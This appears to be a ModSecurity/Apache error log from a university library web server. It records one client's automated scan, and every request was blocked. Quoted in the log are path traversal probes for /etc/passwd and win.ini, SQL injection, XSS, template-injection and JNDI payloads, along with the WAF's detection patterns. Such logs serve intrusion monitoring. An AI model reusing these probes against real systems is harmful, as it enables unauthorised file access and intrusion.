[Tue Aug 29 11:44:51.471329 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfiYr8AAAAg"]
[Tue Aug 29 11:44:51.523173 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAgzyQ8AAAAF"]
[Tue Aug 29 11:44:53.507170 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfiYswAAAAg"]
[Tue Aug 29 11:44:56.391163 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAfg75QAAAAe"]
[Tue Aug 29 11:45:00.886206 2023] [:error] [pid 2170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh6rI0AAAA4"]
[Tue Aug 29 11:45:02.417169 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAe3@IsAAAAA"]
[Tue Aug 29 11:45:02.431387 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAARphJkAAAAU"]
[Tue Aug 29 11:45:03.398579 2023] [:error] [pid 2156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhsngsAAAAp"]
[Tue Aug 29 11:45:04.414642 2023] [:error] [pid 2156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAhsng0AAAAp"]
[Tue Aug 29 11:45:04.414667 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAgzyScAAAAF"]
[Tue Aug 29 11:45:05.358473 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAgzySkAAAAF"]
[Tue Aug 29 11:45:05.379023 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhpwOkAAAAm"]
[Tue Aug 29 11:45:06.375040 2023] [:error] [pid 2107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAg7zHQAAAAJ"]
[Tue Aug 29 11:45:06.387708 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130sCo-f0AAAh13uEAAAAz"]
[Tue Aug 29 11:45:07.406551 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAh13uUAAAAz"]
[Tue Aug 29 11:45:09.383637 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131cCo-f0AAAhvjVsAAAAs"]
[Tue Aug 29 11:45:10.369112 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAhmFQcAAAAj"]
[Tue Aug 29 11:45:11.366560 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAfSWisAAAAB"]
[Tue Aug 29 11:45:12.360506 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAfGah8AAAAT"]
[Tue Aug 29 11:45:13.410093 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAh13u8AAAAz"]
[Tue Aug 29 11:45:15.375436 2023] [:error] [pid 2150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhmFQwAAAAj"]
[Tue Aug 29 11:45:16.373426 2023] [:error] [pid 2171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAh7wtQAAAA5"]
[Tue Aug 29 11:45:17.386779 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAhZReAAAAAG"]
[Tue Aug 29 11:45:17.407770 2023] [:error] [pid 2159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAhvjWUAAAAs"]
[Tue Aug 29 11:45:19.373325 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAARphKwAAAAU"]
[Tue Aug 29 11:45:20.411466 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfkip.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAhlz4oAAAAi"]
[Tue Aug 29 11:45:23.365015 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAfbkxEAAAAZ"]
[Tue Aug 29 11:45:23.397482 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAgzyUIAAAAF"]
[Tue Aug 29 11:45:24.362808 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhBSAcAAAAX"]
[Tue Aug 29 11:45:25.357638 2023] [:error] [pid 2113] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfkip.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhBSAkAAAAX"]
[Tue Aug 29 11:45:25.362094 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhrqIAAAAAo"]
[Tue Aug 29 11:45:25.371599 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAfSWjwAAAAB"]
[Tue Aug 29 11:45:26.399693 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAhxwngAAAAv"]
[Tue Aug 29 11:45:27.353110 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAgzyUgAAAAF"]
[Tue Aug 29 11:45:28.396861 2023] [:error] [pid 2148] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhkLgUAAAAh"]
[Tue Aug 29 11:45:29.423701 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Language_S. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:Language_S: ../../Data/CONFIG/CasDbCnn.dat"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/casmain.xgi"] [unique_id "ZO136cCo-f0AAAhgoIAAAAAb"]
[Tue Aug 29 11:45:30.402708 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfkip.unla.ac.id"] [uri "/systemController/showOrDownByurl.do"] [unique_id "ZO136sCo-f0AAAfiYvsAAAAg"]
